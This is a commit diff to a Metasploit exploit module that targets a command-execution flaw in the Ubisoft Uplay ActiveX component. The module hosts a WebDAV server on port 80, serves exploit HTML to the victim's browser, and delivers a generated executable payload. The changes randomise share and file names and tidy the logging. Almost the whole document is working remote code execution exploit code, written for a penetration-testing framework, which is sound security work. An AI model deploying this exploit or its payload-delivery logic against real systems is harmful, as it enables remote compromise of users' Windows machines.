Removed auto migrate as exploit loads in a seperate process to browser anyway

modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb

@@ -32,9 +32,11 @@ class Metasploit3 < Msf::Exploit::Remote
 					The uplay ActiveX component allows an attacker to execute any command line action.
 					User must sign in, unless auto-sign in is enabled and uplay must not already be running.
 
+					The exploit will request an exe payload over WebDAV, and must be running on port 80.
+
 					Tested in Win XP, does not appear to work in Win7.
 
-					Fixed as of 2.04 Mon 20th July.
+					Ubisoft released patch 2.04 as of Mon 20th July.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
@@ -49,10 +51,6 @@ class Metasploit3 < Msf::Exploit::Remote
 				[
 					[ 'URL', 'http://seclists.org/fulldisclosure/2012/Jul/375']
 				],
-			'DefaultOptions' =>
-				{
-					'InitialAutoRunScript' => 'migrate -f',
-				},
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
@@ -63,12 +61,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		register_options(
 		[
-			OptPort.new(	'SRVPORT',		 [ true, "The daemon port to listen on (do not change)", 80 ]),
-			OptString.new(	'URIPATH',		 [ true, "The URI to use (do not change).", "/" ]),
-			OptString.new(	'BASENAME',		 [ true, "The base name for the listed files.", "policy" ]),
-			OptString.new(	'SHARENAME',	 [ true, "The name of the top-level share.", "documents" ]),
-			OptString.new(	'EXTENSIONS',	 [ true, "The list of extensions to generate", "exe" ])
+			OptPort.new('SRVPORT', [true, "The daemon port to listen on (do not change)", 80]),
+			OptString.new('URIPATH', [true, "The URI to use (do not change).", "/"]),
+			OptString.new('EXPLOITPATH', [false, "The URI to use for the exploit"])
 		], self.class)
+
+		deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT' 'URIPATH') # WebDAV does not support SSL and must run over port 80.
+
+	@basename = rand_text_alpha(8)
+	@share_name = rand_text_alpha(8)
+	@extensions = "exe"
 	end
 
 	def autofilter
@@ -86,13 +88,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		when 'PROPFIND'
 			process_propfind(cli, request)
 		when 'GET'
-			if request.uri_parts['Resource'].include? '12345'
+			if request.uri_parts['Resource'].include? @uplay_uri
 				prompt_uplay(cli, request)
 			else
 				process_get(cli, request)
 			end
 		else
-			print_status("#{request.method} => 404 (#{request.uri})")
+			vprint_status("#{request.method} => 404 (#{request.uri})")
 			resp = create_response(404, "Not Found")
 			resp.body = ""
 			resp['Content-Type'] = 'text/html'
@@ -105,10 +107,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
 		url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
 
-		path = "#{@exploit_unc}#{datastore['SHARENAME']}#{datastore['BASENAME']}.exe"
-		print_status path
+		path = "#{@exploit_unc}#{@share_name}#{@basename}.exe"
+
 		if path.length > 693
-			print_status "Remote path is too long must be < 694 characters"
+			fail_with(Exploit::Failure::Unknown,"Remote path is too long must be < 694 characters")
 			return
 		end
 
@@ -128,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		</html>
 		|
 
-		print_status("Sending exploit HTML")
+		print_status("GET => Exploit")
 		send_response_html(cli, content)
 		handler(cli)
 	end
@@ -139,14 +141,14 @@ class Metasploit3 < Msf::Exploit::Remote
 		webdav = "\\\\#{myhost}\\"
 
 		if blacklisted_path?(request.uri)
-			print_status("GET => 404 [BLACKLIST] (#{request.uri})")
+			vprint_status("GET => 404 [BLACKLIST] (#{request.uri})")
 			resp = create_response(404, "Not Found")
 			resp.body = ""
 			cli.send_response(resp)
 			return
 		end
 
-		if (request.uri =~ /\.(exe)$/i)
+		if (request.uri.include? @basename)
 			print_status("GET => Payload")
 			return if ((p = regenerate_payload(cli)) == nil)
 			data = generate_payload_exe({ :code => p.encoded })
@@ -156,10 +158,10 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Treat index.html specially
 		if (request.uri[-1,1] == "/" or request.uri =~ /index\.html?$/i)
-			print_status("GET => REDIRECT (#{request.uri})")
+			vprint_status("GET => REDIRECT (#{request.uri})")
 			resp = create_response(200, "OK")
 
-			resp.body = %Q|<html><head><meta http-equiv="refresh" content="0;URL=#{@exploit_unc}#{datastore['SHARENAME']}\\"></head><body></body></html>|
+			resp.body = %Q|<html><head><meta http-equiv="refresh" content="0;URL=#{@exploit_unc}#{@share_name}\\"></head><body></body></html>|
 
 			resp['Content-Type'] = 'text/html'
 			cli.send_response(resp)
@@ -167,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		# Anything else is probably a request for a data file...
-		print_status("GET => DATA (#{request.uri})")
+		vprint_status("GET => DATA (#{request.uri})")
 		data = "HELLO!"
 		send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
 	end
@@ -176,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	# OPTIONS requests sent by the WebDav Mini-Redirector
 	#
 	def process_options(cli, request)
-		print_status("OPTIONS #{request.uri}")
+		vprint_status("OPTIONS #{request.uri}")
 		headers = {
 			'MS-Author-Via' => 'DAV',
 			'DASL'          => '<DAV:sql>',
@@ -206,7 +208,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		if path !~ /\/$/
 
 			if blacklisted_path?(path)
-				print_status "PROPFIND => 404 (#{path})"
+				vprint_status "PROPFIND => 404 (#{path})"
 				resp = create_response(404, "Not Found")
 				resp.body = ""
 				cli.send_response(resp)
@@ -214,7 +216,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			end
 
 			if path.index(".")
-				print_status "PROPFIND => 207 File (#{path})"
+				vprint_status "PROPFIND => 207 File (#{path})"
 				body = %Q|<?xml version="1.0" encoding="utf-8"?>
 <D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
 <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
@@ -252,7 +254,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				cli.send_response(resp)
 				return
 			else
-				print_status "PROPFIND => 301 (#{path})"
+				vprint_status "PROPFIND => 301 (#{path})"
 				resp = create_response(301, "Moved")
 				resp["Location"] = path + "/"
 				resp['Content-Type'] = 'text/html'
@@ -300,7 +302,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				body << generate_files(path)
 			end
 		else
-			print_status "PROPFIND => 207 Top-Level Directory"
+			vprint_status "PROPFIND => 207 Top-Level Directory"
 		end
 
 		body << "</D:multistatus>"
@@ -315,7 +317,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def generate_shares(path)
-		share_name = datastore['SHARENAME']
+		share_name = @share_name
 %Q|
 <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
 <D:href>#{path}#{share_name}/</D:href>
@@ -348,8 +350,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		trail = path.split("/")
 		return "" if trail.length < 2
 
-		base  = datastore['BASENAME']
-		exts  = datastore['EXTENSIONS'].gsub(",", " ").split(/\s+/)
+		base  = @basename
+		exts  = @extensions.gsub(",", " ").split(/\s+/)
 		files = ""
 		exts.each do |ext|
 			files << %Q|
@@ -405,6 +407,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 
+		if datastore['EXPLOITPATH']
+			@uplay_uri = datastore['EXPLOITPATH']
+		else
+			@uplay_uri = rand_text_alpha(8)
+		end
+
 		myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
 
 		@exploit_unc  = "\\\\#{myhost}\\"
@@ -413,8 +421,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
 		end
 
-
-		print_status("Exploit links are now available at #{@exploit_unc}#{datastore['SHARENAME']}\\")
+		vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}")
+		print_status("Exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}")
 
 		super
 	end